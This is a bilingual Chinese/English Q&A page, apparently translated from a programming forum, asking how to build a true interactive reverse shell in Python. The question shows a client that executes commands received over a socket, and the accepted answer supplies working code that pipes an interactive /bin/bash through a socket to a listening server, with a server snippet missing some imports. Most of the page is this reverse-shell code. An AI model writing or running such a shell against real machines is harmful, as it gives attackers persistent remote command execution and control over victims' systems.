Python真正的交互式远程反向shell [英] Python true interactive remote reverse shell
问题描述
我正在尝试使用 Python 创建一个 true 交互式远程 shell.当我说 true 时,我的意思是我不想只执行一个命令并发送结果——我已经在工作了.我也不想通过让服务器解释目录更改或不解释来抽象执行单个命令.
I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results- I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
我正在尝试让客户端启动交互式 /bin/bash
并让服务器发送命令,然后这些命令由同一个持久性 shell 执行.例如,如果我运行 cd/foo/bar
那么 pwd
将返回 /foo/bar
因为我将与相同的 bash 交互壳.
I am trying to have a client start an interactive /bin/bash
and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar
then pwd
would return /foo/bar
because I would be interacting with the same bash shell.
这里有一些精简的示例代码,目前只能执行单个命令...
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
cmd = s.recv(1024)
# single command execution currently (not interactive shell)
results = subprocess.Popen(cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(results)
<小时>
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
cmd = raw_input('> ').rstrip()
conn.send(cmd)
results = conn.recv(4096)
print results
我尝试了很多解决方案,但都没有奏效.subprocess 模块有一个通信方法,但它在一个命令后杀死了 shell.我真的很希望能够使用 stdlib 来完成此操作,但在阅读了此线程后,我查看了 pexpect 模块.但是,我也不能让它工作?看起来它的主要用例也不是用于创建交互式 shell,而是捕获特定的命令行输出以进行交互.我什至无法使用 pexpect 执行单个命令...
I've tried many solutions none of which have worked. The subprocess module had a communication method, but it kills the shell after a single command. I'd really like to be able to accomplish this with stdlib, but I've looked at the pexpect module after reading this thread. However, I can't get that to work either? It also doesn't look like it's primary use case is for creating an interactive shell, but rather catching specific command line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
如果有人可以提供帮助,我将不胜感激,我觉得可能有一种方法可以实现多线程并使用子进程生成 /bin/bash -i
以及一些如何写入 stdin并从标准输出读取?提前致谢,抱歉篇幅过长.
If anyone can help it would be appreciated, I feel like there could be a way to multi-thread and spawn off a /bin/bash -i
with subprocess and then some how write to stdin and read from stdout? Thanks in advance, and sorry for the length.
推荐答案
试试这个代码:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
fp.write(sys.stdin.read(4096))
proc1.wait()
这篇关于Python真正的交互式远程反向shell的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!